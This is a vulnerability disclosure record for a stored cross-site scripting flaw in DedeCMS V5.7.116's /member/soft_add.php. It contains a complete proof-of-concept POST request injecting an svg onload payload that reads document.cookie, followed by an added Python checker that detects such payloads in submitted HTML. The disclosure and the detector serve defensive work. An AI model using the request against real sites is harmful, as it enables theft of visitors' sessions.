Submit #453003: DedeCMS V5.7.116 Cross Site Scripting

Title: DedeCMS V5.7.116 Cross Site Scripting
Description:

Summary

A stored Cross-Site Scripting (XSS) vulnerability has been identified in the DedeCMS V5.7.116 content management system. The vulnerability exists due to insufficient filtering of the body parameter in the /member/soft_add.php script. It allows an attacker to inject scripts into software information pages, potentially compromising the security of the website and its users.

Details

The vulnerability is present in the /member/soft_add.php script, which does not adequately sanitize the body parameter. An attacker who can register as a member and publish entries in the software ("soft") channel can exploit this flaw by injecting scripts into the software description. The stored scripts execute in the browser of any user who views the compromised software entry.

Proof of Concept (POC)

POST /member/soft_add.php HTTP/1.1
Host: target-ip
Content-Length: 2657
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoNgLBRDOkaHmDGvr
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: [users'cookie]
Connection: keep-alive

------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="dopost"

save
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="channelid"

3
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="title"

test soft
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="tags"

test
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="writer"

test
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="filetype"

.exe
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="language"

简体中文
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="softtype"

国产软件
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="accredit"

共享软件
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="os"

Win2003,WinXP,Win2000,Win9X
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="softrank"

3
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="officialDemo"


------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="officialUrl"

http://
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="softsize"


------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="unit"

MB
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="source"


------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="typeid"

18
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="needmoney"

0
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="litpic"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="dede_addonfields"


------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="dede_fieldshash"

[users'fieldshash]
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="body"

<p>asd</p><svg/onload=alert(document.cookie)>
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="softurl1"


------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="servermsg1"

本地下载
------WebKitFormBoundaryoNgLBRDOkaHmDGvr
Content-Disposition: form-data; name="picnum"

5
------WebKitFormBoundaryoNgLBRDOkaHmDGvr--
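The root cause described above is that the body field is stored without adequate sanitization. The following is an added example, not DedeCMS code and not part of the advisory: a server-side pre-store check that parses a multipart/form-data request like the PoC, extracts the body field and reports HTML constructs a member-submitted software description never legitimately needs (script-like tags, on* event-handler attributes, javascript: URLs). The request contents are constructed to mirror the PoC's field names; the boundary string is the one from the advisory. The function names and the tag list are this example's own choices.

```python
"""Pre-store check for a member-submitted HTML 'body' field (added example, not DedeCMS code)."""
import re
from html.parser import HTMLParser

# Same boundary string as the advisory's PoC; the request bodies below are constructed.
BOUNDARY = "----WebKitFormBoundaryoNgLBRDOkaHmDGvr"

# Tags a software description has no legitimate need for (example's own choice of list).
DANGEROUS_TAGS = {"script", "iframe", "object", "embed", "meta", "link", "base"}
URL_ATTRS = {"href", "src", "action", "formaction", "xlink:href"}


def build_multipart(fields, boundary=BOUNDARY):
    """Serialise text-only form fields as multipart/form-data (no file parts)."""
    out = []
    for name, value in fields.items():
        out.append(f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"\r\n\r\n{value}\r\n')
    return "".join(out) + f"--{boundary}--\r\n"


def parse_multipart(raw, boundary=BOUNDARY):
    """Return {field name: value} for every part; minimal parser, CRLF framing only."""
    fields = {}
    for part in raw.split(f"--{boundary}"):
        part = part.strip("\r\n")
        if part in ("", "--"):          # leading empty chunk / closing delimiter
            continue
        headers, _, value = part.partition("\r\n\r\n")
        m = re.search(r';\s*name="([^"]*)"', headers)   # '; name=' avoids matching filename=
        if m:
            fields[m.group(1)] = value
    return fields


class XssProbe(HTMLParser):
    """Collects start tags and attributes that carry active content."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        self._check(tag, attrs)

    def handle_startendtag(self, tag, attrs):      # <tag .../> form, checked once
        self._check(tag, attrs)

    def _check(self, tag, attrs):
        if tag in DANGEROUS_TAGS:
            self.findings.append(f"forbidden tag <{tag}>")
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(f"event handler {name} on <{tag}>")
            elif name in URL_ATTRS and value:
                # strip whitespace first: "java\nscript:" style evasions collapse to javascript:
                if re.sub(r"\s", "", value).lower().startswith("javascript:"):
                    self.findings.append(f"javascript: URL in {name} on <{tag}>")


def inspect_submission(raw, field="body"):
    """Findings for one field of the posted form; an empty list means nothing was flagged."""
    probe = XssProbe()
    probe.feed(parse_multipart(raw).get(field, ""))
    probe.close()
    return probe.findings


# Constructed requests that reuse the PoC's field names; only the body value differs.
_COMMON = {"dopost": "save", "channelid": "3", "title": "test soft", "typeid": "18"}
MALICIOUS_REQUEST = build_multipart({**_COMMON, "body": "<p>asd</p><svg/onload=alert(document.cookie)>"})
BENIGN_REQUEST = build_multipart({**_COMMON, "body": "<p>A <b>harmless</b> description.</p>"})

if __name__ == "__main__":
    for label, req in (("malicious", MALICIOUS_REQUEST), ("benign", BENIGN_REQUEST)):
        print(label, inspect_submission(req) or "clean")
```

Note that the probe relies on a real HTML tokenizer rather than a regular expression over the raw text, which is why the PoC's slash-separated `<svg/onload=...>` form is still recognised as an svg tag with an onload attribute. A check like this is a gate for rejecting or logging a submission; the actual fix is allow-list sanitization of the stored HTML (permitted tags and attributes only) combined with output encoding wherever the field is rendered.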
Source: https://github.com/Hebing123/cve/issues/78
User: jiashenghe (UID 39445)
Submission: 11/27/2024 10:34
Moderation: 12/04/2024 17:31 (7 days later)
Status: Accepted
VulDB Entry: 286904 [DedeCMS 5.7.116 /member/soft_add.php body Cross Site Scripting]
Points: 20
